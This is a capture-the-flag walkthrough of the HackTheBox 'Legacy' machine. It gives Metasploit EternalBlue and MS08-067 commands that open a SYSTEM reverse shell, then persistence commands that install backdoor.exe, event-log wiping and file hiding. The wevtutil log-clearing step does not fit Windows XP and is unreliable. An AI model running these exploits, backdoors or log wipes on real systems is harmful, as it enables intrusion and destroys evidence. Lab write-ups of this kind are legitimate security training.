Skip to main content

HackTheBox Legacy

694 words
Edwin | Shiro
Author
Edwin | Shiro
「 ✦ OwO ✦ 」
Table of Contents

Machine Synopsis
#

IP Address: 10.10.10.4

Key Exploitation Techniques:

  • SMB Vulnerability: Exploiting a critical remote code execution vulnerability in the SMBv1 protocol.
  • EternalBlue (MS17-010): Using the famous EternalBlue exploit to gain immediate SYSTEM access.
  • Alternative Vulnerabilities: Identifying and leveraging the MS08-067 vulnerability as a secondary exploitation path.

1. Enumeration
#

Initial reconnaissance with nmap revealed several open ports and a highly vulnerable SMB service.

nmap -p 139,445,3389 -sC -sV 10.10.10.4 -oN nmap_enum.txt

Nmap Results:
#

  • Ports 139 & 445 (SMB): The smb-os-discovery script identified the target as Windows XP, a very old and likely unpatched operating system.
  • Port 3389 (RDP): RDP is closed, meaning we cannot use it for initial access.

A more focused nmap vulnerability scan was performed to confirm the presence of known exploits.

nmap --script vuln -p 139,445 10.10.10.4 -oN nmap_vuln.txt

Nmap Vulnerability Scan Results:
#

  • smb-vuln-ms17-010: The system is vulnerable to EternalBlue, a remote code execution vulnerability affecting SMBv1. This is a high-risk finding.
  • smb-vuln-ms08-067: The system is also vulnerable to MS08-067 (Conficker), another critical SMB vulnerability.

Both vulnerabilities grant remote code execution and lead to a SYSTEM shell.

2. Exploitation: Gaining a SYSTEM Shell
#

Method 1: EternalBlue (MS17-010)
#

EternalBlue is the most direct and modern-for-its-time exploit for this machine. We used the Metasploit framework for a reliable and efficient attack.

First, we started msfconsole and selected the ms17_010_eternalblue exploit module.

msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue

Next, we configured the exploit with the target IP address and our local IP address to receive the reverse shell. The check command confirmed the target was vulnerable.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.10.10.4:445       - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)

Finally, we executed the exploit.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1033)

The exploit successfully ran, and we were immediately granted a Meterpreter session with NT AUTHORITY\SYSTEM privileges, as confirmed by the getuid command.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Because of the nature of the exploit, no separate privilege escalation step was needed.

3. Flag Retrieval
#

With a SYSTEM shell, we located and retrieved both the user.txt and root.txt flags. The user.txt flag was on the john user’s desktop, and the root.txt flag was on the Administrator’s desktop.

C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> cd "C:\Documents and Settings\john\Desktop"
C:\Documents and Settings\john\Desktop> type user.txt
<redacted>
C:\Documents and Settings\john\Desktop> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
<redacted>

4. Alternative Exploitation Methods
#

  • MS08-067 (Conficker): The MS08-067 vulnerability is another viable path to a SYSTEM shell on this machine. Metasploit has a module for this exploit as well. This exploit is older than EternalBlue and was widely used to spread the Conficker worm.

    msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

  • Manual Python Exploits: There are several Python implementations of the EternalBlue exploit available on GitHub that can be used instead of Metasploit. These scripts often require manual payload generation and rely on a netcat listener.

5. Post-Exploitation and Defense Evasion
#

After a successful compromise, a professional engagement requires establishing persistence and removing traces of the activity.

A. Persistence
#

  • Registry Key: Adding an entry to the Run registry key ensures a payload is executed on system startup.

    C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\backdoor.exe"
The operation completed successfully.

  • Service Installation: Creating a new service that starts automatically provides a robust persistence method.

    C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\backdoor.exe" start= auto
[SC] CreateService SUCCESS

  • Scheduled Task (Windows XP): The at command can be used to schedule a task to run at a specific time or on a recurring basis.

    C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\backdoor.exe"
Added a new job with job ID = 1

B. Defense Evasion
#

  • Log Cleanup: Clear the Windows event logs to remove evidence of the intrusion.

    C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"

  • File Attribute Manipulation: Hide malicious files by changing their attributes to hidden and system.

    C:\WINDOWS\system32> attrib +h +s "C:\WINDOWS\system32\backdoor.exe"